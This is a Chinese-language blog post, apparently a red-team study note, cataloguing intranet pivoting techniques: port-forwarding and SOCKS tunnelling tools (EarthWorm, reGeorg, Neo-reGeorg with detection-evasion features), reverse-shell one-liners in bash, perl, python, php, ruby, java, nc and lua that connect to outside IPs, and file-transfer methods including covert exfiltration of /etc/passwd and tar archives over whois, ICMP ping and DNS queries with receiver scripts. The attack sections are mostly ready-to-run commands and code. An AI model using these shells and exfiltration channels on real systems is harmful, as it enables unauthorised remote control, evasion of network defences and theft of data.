前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >内网跨边界应用

内网跨边界应用

作者头像
红客突击队
发布于 2022-09-29 13:43:44
发布于 2022-09-29 13:43:44
92100
代码可运行
举报
文章被收录于专栏:kaydenkayden
运行总次数:0
代码可运行

内网跨边界应用

前言

与内网渗透系列:内网穿透(隧道)学习可以互相补充

一、内网跨边界转发

1、NC端口转发

netcat瑞士军刀 参见Kali linux 学习笔记(四)基本工具熟悉——nc(netcat) 2020.2.14 powershell版:https://github.com/besimorhino/powercat

2、LCX端口转发

Go版:https://github.com/cw1997/NATBypass C版:https://github.com/windworst/LCX C++版:https://github.com/UndefinedIdentifier/LCX

3、nps

github:https://github.com/ehang-io/nps

支持tcpudp、socks5、http等几乎所有流量转发,可用来访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析、内网socks5代理等等

4、frp

github:https://github.com/fatedier/frp

用Go写的,支持TCP和UDP,以及HTTP和HTTPS协议,同时也支持P2P,仍在持续更新

5、代理脚本

  • Tunna:https://github.com/SECFORCE/Tunna
  • reDuh:https://github.com/sensepost/reDuh

二、内网跨边界代理

1、EW

官网:http://rootkiter.com/EarthWorm/ github:https://github.com/rootkiter/Binary-files 下载:https://github.com/rootkiter/Binary-files/tree/bd3223082afbf88421fe391eb55b9eb2da7d533e

十分方便的多级SOCKS代理,已经永久停止更新,五种管道:

  • ssocksd : 正向代理
  • rssocks : 反向代理
  • lcx_slave:该管道一侧通过反弹方式连接代理请求,另一侧连接代理提供主机
  • lcx_tran : 该管道通过监听本地端口代理请求,并转发给代理提供主机
  • lcx_listen : 该管道通过监听本地端口接收数据,并将其转发给目标网络回连的代理提供主机

(1)正向 SOCKS v5 服务器

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
./ew -s ssocksd -l 1080

(2)反弹 SOCKS v5 服务器

先在一台具有公网 ip 的主机A上运行以下命令:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
$ ./ew -s rcsocks -l 1080 -e 8888 

在目标主机B上启动 SOCKS v5 服务 并反弹到公网主机的 8888端口

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
$ ./ew -s rssocks -d 1.1.1.1 -e 8888 

(3)多级级联

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
$ ./ew -s lcx_listen -l 1080 -e 8888
$ ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999
$ ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999

lcx_tran 的用法

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
$ ./ew -s ssocksd -l 9999
$ ./ew -s lcx_tran -l 1080 -f 127.0.0.1 -g 9999

lcx_listen、lcx_slave 的用法

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
$ ./ew -s lcx_listen -l 1080 -e 8888
$ ./ew -s ssocksd -l 9999
$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999


“三级级联”的本地SOCKS测试用例以供参考

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
$ ./ew -s rcsocks -l 1080 -e 8888
$ ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
$ ./ew -s lcx_listen -l 9999 -e 7777
$ ./ew -s rssocks -d 127.0.0.1 -e 7777

2、Termite

官网:http://rootkiter.com/Termite/ github:https://github.com/rootkiter/Binary-files/tree/bd3223082afbf88421fe391eb55b9eb2da7d533e 使用说明:https://rootkiter.com/Termite/README.txt

EarthWorm的升级版,已经永久停止更新

3、reGeorg

github:https://github.com/sensepost/reGeorg

SOCKS over HTTP,即通过HTTP隧道转发SOCKS,用Python写的,基于Python2.7和urllib3,上传一个Tunnel脚本,然后远程连接转发端口即可建立socket代理隧道

  • 对于aspx的网站假如总是报错,可以尝试ashx脚本
  • PHP程序确认php.ini中socket模块正常开启并且可用,reGeorge也提供了nosocket脚本
  • linux下利用proxychains,Windows下利用proxifier实现任意应用通过代理
  • 假如绑定某些端口会遇到socket无法建立连接时,尝试着利用80、53等穿透性强的端口

4、Neo-reGeorg

github:https://github.com/L-codes/Neo-reGeorg

重构版reGeorg,提高稳定性和可用性,避免特征检测,更新活跃

根据作者说法:

  • 传输内容经过变形 base64 加密,伪装成 base64 编码
  • 直接请求响应可定制化 (如伪装的404页面)
  • HTTP Headers 的指令随机生成,避免特征检测
  • HTTP Headers 可定制化
  • 自定义 HTTP 响应码
  • 多 URL 随机请求
  • 服务端 DNS 解析
  • 兼容 python2 / python3
  • 服务端环境的高兼容性
  • (仅 php) 参考 pivotnacci 实现单 Session 创建多 TCP 连接,应对部分负载均衡场景
  • aspx/ashx/jsp/jspx 已不再依赖 Session,可在无 Cookie 等恶劣环境正常运行
  • 支持内网转发,应对负载均衡环境

5、pystinger(毒刺)

github:https://github.com/FunnyWolf/pystinger

仍在更新,通过webshell实现内网SOCK4代理,端口映射 可直接用于metasploit-framework,viper,cobalt strike上线 主体使用python开发,当前支持php,jsp(x),aspx三种代理脚本

6、ABPTTS

github:https://github.com/nccgroup/ABPTTS

TCP over HTTP,即通过HTTP隧道转发TCP连接

  • 数据加密,可自定义HTTP数据
  • 对抗特征检测十分优秀
  • 创建的隧道十分稳定
  • 比较遗憾的是支持的web脚本类型只有aspx和jsp

三、shell反弹

1、bash

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

2、perl

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

3、python

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

4、php

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

5、ruby

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

6、java

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

7、nc

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#使用-e 
nc -e /bin/sh 223.8.200.234 1234 
#不使用-e
mknod /tmp/backpipe p
/bin/sh 0/tmp/backpipe | nc attackerip listenport 1>/tmp/backpipe

8、lua

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
lua -e "require('socket');require('os');t=socket.tcp();t:connect('202.103.243.122','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"

四、内网文件的传输和下载

1、wput

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
wput dir_name ftp://linuxpig:123456@host.com/

2、wget

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
wget http://site.com/1.rar -O 1.rar

3、ariac2(需安装)

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
aria2c -o owncloud.zip https://download.owncloud.org/community/owncloud-9.0.0.tar.bz2

4、powershell

5、vbs脚本

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
Set args = Wscript.Arguments
Url = "http://domain/file"
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", Url, False
xHttp.Send
with bStrm
.type = 1 '
.open
.write xHttp.responseBody
.savetofile " C:\%homepath%\file", 2 '
end with

执行 :cscript test.vbs

6、Perl

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#!/usr/bin/perl 
use LWP::Simple; 
getstore("http://domain/file", "file");

执行:perl test.pl

7、Python

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#!/usr/bin/python 
import urllib2 
u = urllib2.urlopen('http://domain/file') 
localFile = open('local_file', 'w') 
localFile.write(u.read()) 
localFile.close()

执行:python test.py

8、Ruby

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
#!/usr/bin/ruby
require 'net/http'
Net::HTTP.start("www.domain.com") { |http|
  r = http.get("/file")
  open("save_location", "wb") { |file|
    file.write(r.body)
  }
}

执行:ruby test.rb

9、PHP

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
<?php
$url  = 'http://www.example.com/file';
$path = '/path/to/file';
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$data = curl_exec($ch);
curl_close($ch);
file_put_contents($path, $data);
?>

执行:php test.php

10、NC

attacker

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
cat file | nc -l 1234

target

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
nc host_ip 1234 > file

11、FTP

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
ftp 127.0.0.1 username password get file exit

12、TFTP

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
tftp -i host GET C:%homepath%file location_of_file_on_tftp_server

13、Bitsadmin

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
bitsadmin /transfer n http://domain/file c:%homepath%file

14、Window 文件共享

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
net use x: \127.0.0.1\share /user:example.comuserID myPassword

15、SCP

本地到远程

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
scp file user@host.com:/tmp

远程到本地

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
scp user@host.com:/tmp file

16、rsync

远程rsync服务器中拷贝文件到本地机

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
rsync -av root@192.168.78.192::www /databack

本地机器拷贝文件到远程rsync服务器

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
rsync -av /databack root@192.168.78.192::www

17、certutil.exe

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
certutil.exe -urlcache -split -f http://site.com/file

18、copy

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
copy \\IP\ShareName\file.exe file.exe

19、WHOIS

接收端 Host B:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
nc -vlnp 1337 | sed "s/ //g" | base64 -d

发送端 Host A:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
whois -h host_ip -p 1337 `cat /etc/passwd | base64`

20、WHOIS + TAR

First:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
ncat -k -l -p 4444 | tee files.b64  #tee to a file so you can make sure you have it

Next

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
tar czf - /tmp/* | base64 | xargs -I bits timeout 0.03 whois -h host_ip -p 4444 bits

Finally

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
cat files.b64 | tr -d '\r\n' | base64 -d | tar zxv #to get the files out

21、PING

发送端:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
xxd -p -c 4 secret.txt | while read line; do ping -c 1 -p $line ip; done

接收端 ping_receiver.py:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
import sys

try:
    from scapy.all import *
except:
    print("Scapy not found, please install scapy: pip install scapy")
    sys.exit(0)


def process_packet(pkt):
    if pkt.haslayer(ICMP):
        if pkt[ICMP].type == 8:
            data = pkt[ICMP].load[-4:]
            print(f'{data.decode("utf-8")}', flush=True, end="", sep="")

sniff(iface="eth0", prn=process_packet)
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
python3 ping_receiver.py

22、DIG

发送端:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
xxd -p -c 31 /etc/passwd | while read line; do dig @172.16.1.100 +short +tries=1 +time=1 $line.gooogle.com; done

接收端dns_reciver.py:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
try:
    from scapy.all import *
except:
    print("Scapy not found, please install scapy: pip install scapy")

def process_packet(pkt):
    if pkt.haslayer(DNS):
        domain = pkt[DNS][DNSQR].qname.decode('utf-8')
        root_domain = domain.split('.')[1]
        if root_domain.startswith('gooogle'):
            print(f'{bytearray.fromhex(domain[:-13]).decode("utf-8")}', flush=True, end='')

sniff(iface="eth0", prn=process_packet)
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
python3 dns_reciver.py

五、搭建 HTTP server

python2

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
python -m SimpleHTTPServer 1337

python3

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
python -m http.server 1337

PHP 5.4+

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
php -S 0.0.0.0:1337

ruby

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => 1337, :DocumentRoot => Dir.pwd).start'ruby -run -e httpd . -p 1337

Perl

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
perl -MHTTP::Server::Brick -e '$s=HTTP::Server::Brick->new(port=>1337); $s->mount("/"=>{path=>"."}); $s->start'
perl -MIO::All -e 'io(":8080")->fork->accept->(sub { $_[0] < io(-x $1 +? "./$1 |" : $1) if /^GET \/(.*) / })'

busybox httpd

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
busybox httpd -f -p 8000

结语

见识了好些内网跨边界方法,回头细学下


红客突击队于2019年由队长k龙牵头,联合国内多位顶尖高校研究生成立。其团队从成立至今多次参加国际网络安全竞赛并取得良好成绩,积累了丰富的竞赛经验。团队现有三十多位正式成员及若干预备人员,下属联合分队数支。红客突击队始终秉承先做人后技术的宗旨,旨在打造国际顶尖网络安全团队。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2022-07-26,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 红客突击队 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
最好用的内网穿透工具合集
在渗透过程中,我们需要快速实现内网穿透,从而绕过网络访问限制,直接从外网来访问内网。今天,我们来推荐几款非常好用的内网穿透工具,如有其它推荐,欢迎补充和指正。
Bypass
2020/09/08
8K1
最好用的内网穿透工具合集
内网渗透测试:隐藏通讯隧道技术
上一节中,我们讲解了网络层的隧道技术(IPv6 隧道、ICMP 隧道)和传输层的隧道技术(TCP 隧道、UDP 隧道、常规端口转发)。现如今,TCP、UDP 通信大量被防御系统拦截,传统的Socket隧道也已经濒临淘汰,DNS、ICMP、HTTP/HTTPS 等难以被禁用的协议已经成为了攻击者控制隧道的主要渠道。在这一节中,我们将对应用层的隧道 SOCKS 代理技术进行实验性的讲解,由于小编能力太菜,很多东东也是现学现卖,应用层的DNS隧道我会在未来专门写一个专题进行讲解。
FB客服
2020/07/13
2.3K0
内网漫游之SOCKS代理大结局
在实际渗透过程中,我们成功入侵了目标服务器。接着我们想在本机上通过浏览器或者其他客户端软件访问目标机器内部网络中所开放的端口,比如内网的3389端口、内网网站8080端口等等。传统的方法是利用nc、lcx等工具,进行端口转发。
Ms08067安全实验室
2019/09/24
2.3K0
内网漫游之SOCKS代理大结局
内网隐藏通信隧道技术——EW隧道
在研究人员的渗透测试中,EW很好用,体积小,Linux为30kb左右,windows为56kb左右。EW是一套便携式的网络穿透工具,具有SOCKS v5服务架设和端口转发两大核心功能,可以在复杂的网络环境下完成网络穿透。
FB客服
2021/08/24
2.1K0
安全攻防 | EarthWorm 代理
EW(Earthworm)是一套便携式的网络穿透工具,具有SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。
安全小王子
2021/03/16
8660
【内网渗透】关于内网代理转发技术
有如下图所示测试环境,外网服务器拥有双网卡,既可与公网进行通信,也可以与内网服务器进行通信。
一名白帽的成长史
2020/07/20
2.8K0
【内网渗透】关于内网代理转发技术
推荐几款实用的内网穿透工具
本文以渗透的视角,总结几种个人常用的内网穿透,内网代理工具,介绍其简单原理和使用方法。
Java团长
2022/02/10
9K1
推荐几款实用的内网穿透工具
内网渗透之隐藏通信隧道技术
前段时间读了读徐哥的《内网安全攻防》,并复现了部分知识点,写篇文章记录下学习内容。
FB客服
2021/07/03
1.8K0
内网渗透之隐藏通信隧道技术
常见内网穿透工具,收好了!
点击上方“芋道源码”,选择“设为星标” 管她前浪,还是后浪? 能浪的浪,才是好浪! 每天 10:33 更新文章,每天掉亿点点头发... 源码精品专栏 原创 | Java 2021 超神之路,很肝~ 中文详细注释的开源项目 RPC 框架 Dubbo 源码解析 网络应用框架 Netty 源码解析 消息中间件 RocketMQ 源码解析 数据库中间件 Sharding-JDBC 和 MyCAT 源码解析 作业调度中间件 Elastic-Job 源码解析 分布式事务中间件 TCC-Transaction
芋道源码
2022/04/18
1.4K0
常见内网穿透工具,收好了!
安排几款实用的内网穿透工具+教程
本文以渗透的视角,总结几种个人常用的内网穿透,内网代理工具,介绍其简单原理和使用方法。
民工哥
2021/11/26
1.3K0
内网建立传输通道
参考:http://www.0-sec.org/Tools/Cobalt%20Strike/32.html
渗透攻击红队
2020/05/25
1.4K0
内网建立传输通道
代理与转发常用工具汇总
自己对内网渗透搭建链路上很不熟练,乘着出差路上测试一下,有不当之处多多指正。好久不发文了,居然有付费阅读了,借此机会测试一下,内容比较粗糙,后期在全文发。相关工具在后台回复“01代理转发”可以获取下载链接。
用户5878089
2021/03/11
2.9K0
内网渗透之隐藏通信隧道 -- sock5
SOCKS是一种代理服务,可以简单地将一端的系统连接另一 端。 SOCKS支持多种协议,包括HTTP、FTP等。SOCKS分为SOCKS 4和SOCKS 5两种类型: SOCKS 4只支持TCP协议;SOCKS5不仅支持TCP/UDP协议,还支持各种身份验证机制等,其标准端口为1080.SOCKS能够与目标内网计算机进行通信,避免多次使用端口转发。
Gh0st1nTheShel
2021/11/23
5.5K0
常见内网穿透工具,收好了!
目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析等等……)。
网络工程师笔记
2023/09/09
1.4K0
常见内网穿透工具,收好了!
内网渗透基石篇-- 隐藏通信隧道技术(上)
在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对通信进行阻断。那么什么是隧道呢?这里的隧道,就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装,然后穿过防火墙,与对方进行通信。当封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应服务器上。
顾翔
2021/05/17
2.6K0
内网渗透基石篇-- 隐藏通信隧道技术(上)
基于百香果内网安全沙盘的SOCKS学习·上篇
上周斗哥给大家介绍来“百香果”内网安全沙盘的构建,主要用于学习内网渗透的基础环境,那么内网渗透中最基础的就是内网通信隧道了,本期给大家带来内网通信隧道中SOCKS的学习。
pensar
2021/01/08
9340
内网渗透常用端口转发与代理工具枚举
lcx.exe是一个端口转发工具,有Windows版和Linux版两个版本,Windows版是lcx.exe,Linux版为portmap,
字节脉搏实验室
2020/04/24
3.1K0
一款多平台网络穿透工具EW
该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。
七夜安全博客
2018/08/16
1.2K0
一款多平台网络穿透工具EW
基于百香果内网安全沙盘的SOCKS学习·下篇
上周斗哥给大家介绍了在“百香果”内网安全沙盘中SOCKS的4款工具的基本使用,模拟了在实战情况下Socks工具的使用,掌握在通信隧道中基本的网络结构,本期将继续给大家带来内网通信隧道中SOCKS代理更为复杂的实战环境的模拟。
pensar
2021/01/08
6980
【红蓝对抗】内网代理转发
转发目标主机的3389远程桌面服务端口到本地的8888,使用linux中的rdesktop连接本地的8888端口。
鸿鹄实验室
2021/12/01
2.4K0
【红蓝对抗】内网代理转发
相关推荐
最好用的内网穿透工具合集
更多 >
LV.1
中龙技术安全研究院
目录
  • 内网跨边界应用
  • 前言
  • 一、内网跨边界转发
    • 1、NC端口转发
    • 2、LCX端口转发
    • 3、nps
    • 4、frp
    • 5、代理脚本
  • 二、内网跨边界代理
    • 1、EW
      • (1)正向 SOCKS v5 服务器
      • (2)反弹 SOCKS v5 服务器
      • (3)多级级联
    • 2、Termite
    • 3、reGeorg
    • 4、Neo-reGeorg
    • 5、pystinger(毒刺)
    • 6、ABPTTS
  • 三、shell反弹
    • 1、bash
    • 2、perl
    • 3、python
    • 4、php
    • 5、ruby
    • 6、java
    • 7、nc
    • 8、lua
  • 四、内网文件的传输和下载
    • 1、wput
    • 2、wget
    • 3、ariac2(需安装)
    • 4、powershell
    • 5、vbs脚本
    • 6、Perl
    • 7、Python
    • 8、Ruby
    • 9、PHP
    • 10、NC
    • 11、FTP
    • 12、TFTP
    • 13、Bitsadmin
    • 14、Window 文件共享
    • 15、SCP
    • 16、rsync
    • 17、certutil.exe
    • 18、copy
    • 19、WHOIS
    • 20、WHOIS + TAR
    • 21、PING
    • 22、DIG
  • 五、搭建 HTTP server
  • 结语
领券
💥开发者 MCP广场重磅上线!
精选全网热门MCP server,让你的AI更好用 🚀
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档